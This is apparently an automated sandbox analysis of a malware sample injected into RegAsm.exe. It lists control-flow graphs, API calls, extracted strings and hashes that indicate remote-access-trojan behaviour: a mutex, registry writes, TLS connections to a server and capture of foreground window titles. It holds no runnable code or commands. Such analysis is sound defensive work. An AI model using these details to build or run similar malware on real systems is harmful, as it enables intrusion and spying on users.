                                  • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 581 415aa3-415ab5 call 404e26 call 4021fa 561->581 566->581 582 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->582 567->581 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 581->597 598 415add-415ae5 call 401e8d 581->598 648 415380-41538d call 405aa6 582->648 649 415392-4153b9 call 401fab call 4135a6 582->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 906 415a21-415a23 902->906 904 415a33-415a38 call 40b051 903->904 905 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->905 904->905 917 415a71-415a7d CreateThread 905->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 905->918 906->903 917->918 918->581
                                  APIs
                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$ErrorLastLocalTime
                                  • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                  • API String ID: 524882891-2158775120
                                  • Opcode ID: 9497a8cef06d9965077653e5d14c9f88a6240dc4e4311364d1378025ff75ed42
                                  • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                  • Opcode Fuzzy Hash: 9497a8cef06d9965077653e5d14c9f88a6240dc4e4311364d1378025ff75ed42
                                  • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                  Control-flow Graph

                                  APIs
                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                  • API String ID: 994465650-2151626615
                                  • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                  • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                  • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                  • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1000 40da34-40da59 call 401f86 1003 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1000->1003 1004 40da5f 1000->1004 1025 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1003->1025 1006 40da70-40da7e call 41b5b4 call 401f13 1004->1006 1007 40da91-40da96 1004->1007 1008 40db51-40db56 1004->1008 1009 40daa5-40daac call 41bfb7 1004->1009 1010 40da66-40da6b 1004->1010 1011 40db58-40db5d 1004->1011 1012 40da9b-40daa0 1004->1012 1013 40db6e 1004->1013 1014 40db5f-40db64 call 43c0cf 1004->1014 1034 40da83 1006->1034 1016 40db73-40db78 call 43c0cf 1007->1016 1008->1016 1026 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1026 1027 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1027 1010->1016 1011->1016 1012->1016 1013->1016 1022 40db69-40db6c 1014->1022 1028 40db79-40db7e call 409057 1016->1028 1022->1013 1022->1028 1026->1034 1039 40da87-40da8c call 401f09 1027->1039 1028->1003 1034->1039 1039->1003
                                  APIs
                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 82841172-425784914
                                  • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                  • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                  • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                  • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1100 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1111 41b35d-41b366 1100->1111 1112 41b31c-41b32b call 4135a6 1100->1112 1114 41b368-41b36d 1111->1114 1115 41b36f 1111->1115 1117 41b330-41b347 call 401fab StrToIntA 1112->1117 1116 41b374-41b37f call 40537d 1114->1116 1115->1116 1122 41b355-41b358 call 401fd8 1117->1122 1123 41b349-41b352 call 41cf69 1117->1123 1122->1111 1123->1122
                                  APIs
                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                    • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                    • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                  • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue
                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1866151309-2070987746
                                  • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                  • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                  • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                  • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountEventTick
                                  • String ID: !D@$NG
                                  • API String ID: 180926312-2721294649
                                  • Opcode ID: f36f2d49ab2961808af81894e896c9fe5fba8881db75f6a1af782146f5b63878
                                  • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                  • Opcode Fuzzy Hash: f36f2d49ab2961808af81894e896c9fe5fba8881db75f6a1af782146f5b63878
                                  • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1282 41376f-413786 RegCreateKeyA 1283 413788-4137bd call 40247c call 401fab RegSetValueExA RegCloseKey 1282->1283 1284 4137bf 1282->1284 1286 4137c1-4137cf call 401fd8 1283->1286 1284->1286
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                  • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137A6
                                  • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: pth_unenc
                                  • API String ID: 1818849710-4028850238
                                  • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                  • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                  • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                  • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

                                  Control-flow Graph

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                  • FindCloseChangeNotification.KERNEL32(?,?,00000000), ref: 00404DDB
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2579639479-0
                                  • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                  • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                  • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                  • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1340 40d069-40d095 call 401fab CreateMutexA GetLastError
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                  • GetLastError.KERNEL32 ref: 0040D083
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateErrorLastMutex
                                  • String ID: SG
                                  • API String ID: 1925916568-3189917014
                                  • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                  • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                  • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                  • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1343 4135a6-4135d2 RegOpenKeyExA 1344 4135d4-4135fc RegQueryValueExA RegCloseKey 1343->1344 1345 413607 1343->1345 1346 413609 1344->1346 1347 4135fe-413605 1344->1347 1345->1346 1348 41360e-41361a call 402093 1346->1348 1347->1348
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • RegCloseKey.KERNEL32(?), ref: 004135F2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                  • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                  • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                  • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1351 4136f8-41371c RegOpenKeyExA 1352 413768 1351->1352 1353 41371e-413740 RegQueryValueExA RegCloseKey 1351->1353 1355 41376a-41376e 1352->1355 1353->1352 1354 413742-413766 call 406cb7 call 406d3c 1353->1354 1354->1355
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                  • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                  • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                  • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                  • RegCloseKey.KERNEL32(?), ref: 00413592
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                  • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                  • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                  • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                  • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                  • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID:
                                  • API String ID: 1818849710-0
                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                  • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                  • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcslen
                                  • String ID: pQG
                                  • API String ID: 176396367-3769108836
                                  • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                  • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                  • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                  • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID: @
                                  • API String ID: 1890195054-2766056989
                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                  APIs
                                  • _free.LIBCMT ref: 004461A6
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap$_free
                                  • String ID:
                                  • API String ID: 1482568997-0
                                  • Opcode ID: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
                                  • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                                  • Opcode Fuzzy Hash: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
                                  • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                                  APIs
                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventStartupsocket
                                  • String ID:
                                  • API String ID: 1953588214-0
                                  • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                  • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                  • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                  • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                  • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                  • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                  • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0041BAB8
                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ForegroundText
                                  • String ID:
                                  • API String ID: 29597999-0
                                  • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                  • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                  • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                  • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                  APIs
                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                  • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                    • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                    • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                    • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                    • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                    • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                  • String ID:
                                  • API String ID: 1170566393-0
                                  • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
